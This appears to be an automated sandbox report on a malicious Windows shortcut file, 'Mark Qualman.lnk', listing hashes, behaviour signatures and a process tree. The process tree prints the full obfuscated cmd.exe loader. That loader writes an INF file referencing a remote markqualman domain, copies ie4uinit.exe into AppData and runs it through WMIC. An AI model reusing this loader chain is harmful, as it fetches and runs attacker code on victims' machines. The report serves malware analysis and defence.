Overview

overview

7

Static

static

1

Mark Qualman.lnk

windows7-x64

7

Mark Qualman.lnk

windows10-2004-x64

7

Analysis

  • max time kernel
    148s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23/08/2024, 05:27

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    Mark Qualman.lnk

  • Size

    5KB

  • MD5

    4a792636a97df1ddec0d4e54272ca177

  • SHA1

    038ef3af740407c9514b28e7aa8524bcf84b9bed

  • SHA256

    f115187143a80b062a4844dbd462ed183e374263eeea874780eb65775991da22

  • SHA512

    3beb9b7608a93757913cd7f31614f5cbdd9a0a6c7bb9ad9fa70cb7d498b8479f89bf46217f7ad70eb731ef933f627cc3e33599d275396ca69eda3b9e714909b7

  • SSDEEP

    96:8u5XtaRd9qmN5yYLhTrrfhbFKyVmZXj5kpYZuBPSk:8Mad9qm7yurdbFxaj5kpXF

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 64 IoCs
    adwarespyware
  • Suspicious use of AdjustPrivilegeToken 42 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Mark Qualman.lnk"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3012
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /v /c (for %u in (s) do @set "Assets=%~u") && (for %q in (a) do @!Assets!et "Totals=%~q") && !Assets!et "Improvements=default" && (for %d in (c) do @!Assets!et "Someone=%~d") && !Assets!et "Occasions=d" && !Assets!et "Facts=si" && !Assets!et "Scholars=version" && !Assets!et "Appliances=settings" && !Assets!et "Proceeds=t" && !Assets!et "Truly=ure = " && !Assets!et "Belongs=ni" && !Assets!et "Arrow=e" && !Assets!et "Tattoo=$win" && !Assets!et "Moderators=." && !Assets!et "Plastics=a" && !Assets!et "Traditions=!Moderators!inf" && !Assets!et "Barrel=ieui!Belongs!t!Traditions!" && c!Plastics!ll !Assets!et "Cleaners=%!Totals!ppd!Plastics!ta%\micro!Assets!oft\" && s!Arrow!t "Officers=!Cleaners!!Barrel!" && (for %u in ("[!Scholars!]" "signat!Truly!!Tattoo!dows nt$" "[7E55D7]" "ieu%Quantities%!Traditions!" "[!Occasions!e!Assets!tinationdirs]" "!Improvements!destdir=11" "7E55D7=01" "[BCB]" "sc\" "ro%Weights%j,NI,%Umbrella%%Situate%%Situate%p%Racks%%Otherwise%%Otherwise%oshof!Moderators!markqualman!Moderators!%Produce%/jlghiht" "[s!Proceeds!ring!Assets!]" "Otherwise=/" "!Assets!ervicen!Totals!me=' '" "!Assets!hortsvcn!Totals!me=' '" "Umbrella=h" "Order=%time%" "Situate=t;Pencil" "Racks=:;Bones" "Quantities=i!Belongs!t" "Produce=com" "Weights=b;Unaware" "[!Improvements!in!Assets!tall.windows7]" "!Occasions!elfil!Arrow!s=7E55D7" "Un\" "Register\" "OCXs=BCB" ) do @e!Someone!ho %~u)>"!Officers!" && !Assets!et "Refers=ie4ui!Belongs!t.!Arrow!xe" && !Someone!all x!Someone!opy /Y /C /Q %win!Occasions!ir%\!Assets!ys!Proceeds!!Arrow!m32\!Refers! "!Cleaners!*" | !Assets!et Receivers04=Naive && !Assets!t!Totals!rt "" wmi!Someone! proce!Assets!s call !Someone!rea!Proceeds!e "!Cleaners!!Refers! -base!Appliances!" | !Assets!et "Receivers58=Stands Claim River Solid Twist Condos Meadow Cheers Weasel Luggage Gross Tanks Acquisitions Taste Gesture Version Referrals Fears Cameras Obtain Bullet Managers Medal Spots Commissions Dimensions Strips Checks Swarm Praise Increase Jeans Power Plants Colours Signs Possibilities Consensus Marine Investors Poverty Science"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2332
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" call xcopy /Y /C /Q %windir%\system32\ie4uinit.exe "C:\Users\Admin\AppData\Roaming\microsoft\*" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:540
        • C:\Windows\system32\xcopy.exe
          xcopy /Y /C /Q C:\Windows\system32\ie4uinit.exe "C:\Users\Admin\AppData\Roaming\microsoft\*"
          4⤵
            PID:4528
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" set Receivers04=Naive "
          3⤵
            PID:2616
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" start "" wmic process call create "C:\Users\Admin\AppData\Roaming\microsoft\ie4uinit.exe -basesettings" "
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:32
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic process call create "C:\Users\Admin\AppData\Roaming\microsoft\ie4uinit.exe -basesettings"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:3048
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" set "Receivers58=Stands Claim River Solid Twist Condos Meadow Cheers Weasel Luggage Gross Tanks Acquisitions Taste Gesture Version Referrals Fears Cameras Obtain Bullet Managers Medal Spots Commissions Dimensions Strips Checks Swarm Praise Increase Jeans Power Plants Colours Signs Possibilities Consensus Marine Investors Poverty Science""
            3⤵
              PID:1264
        • C:\Users\Admin\AppData\Roaming\microsoft\ie4uinit.exe
          C:\Users\Admin\AppData\Roaming\microsoft\ie4uinit.exe -basesettings
          1⤵
          • Executes dropped EXE
          • Drops file in Program Files directory
          • Drops file in Windows directory
          • Modifies Internet Explorer settings
          • Suspicious use of WriteProcessMemory
          PID:4764
          • C:\Users\Admin\AppData\Roaming\microsoft\ie4uinit.exe
            C:\Users\Admin\AppData\Roaming\microsoft\ie4uinit.exe -ClearIconCache
            2⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:4092
            • C:\Windows\system32\RunDll32.exe
              C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0
              3⤵
                PID:324
              • C:\Windows\system32\RunDll32.exe
                C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0
                3⤵
                  PID:1504

            Network

                  MITRE ATT&CK Enterprise v15

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\Users\Admin\AppData\Roaming\Microsoft\ie4uinit.exe
                    Filesize

                    262KB

                    MD5

                    a2f0104edd80ca2c24c24356d5eacc4f

                    SHA1

                    8269b9fd9231f04ed47419bd565c69dc677fab56

                    SHA256

                    5d85c4d62cc26996826b9d96a9153f7e05a2260342bd913b3730610a1809203c

                    SHA512

                    e7bb87f9f6c82cb945b95f62695be98b3fa827a24fa8c4187fe836d4e7d3e7ae3b95101edd3c41d65f6cb684910f5954a67307d450072acd8d475212db094390

                    Download Submit

                  • C:\Users\Admin\AppData\Roaming\microsoft\ieuinit.inf
                    Filesize

                    482B

                    MD5

                    9408963b463ae977ab3121575fdef9ba

                    SHA1

                    c95953b9972aa295dae5b7ec586dfd3b98ed664b

                    SHA256

                    ff62fb0c98a017b38a5ad52908aa3b7333f90abb1d66b012b33a6550ce19e988

                    SHA512

                    92c86e6305cc4dafb95773ee7dcb4b70aa96a91f7c9f560635047ed32fcb35fa652ac06208bc47e8a01c18c71254b9c461b07ddf7992ca9fc7bd1e4f8be786b3

                    Download Submit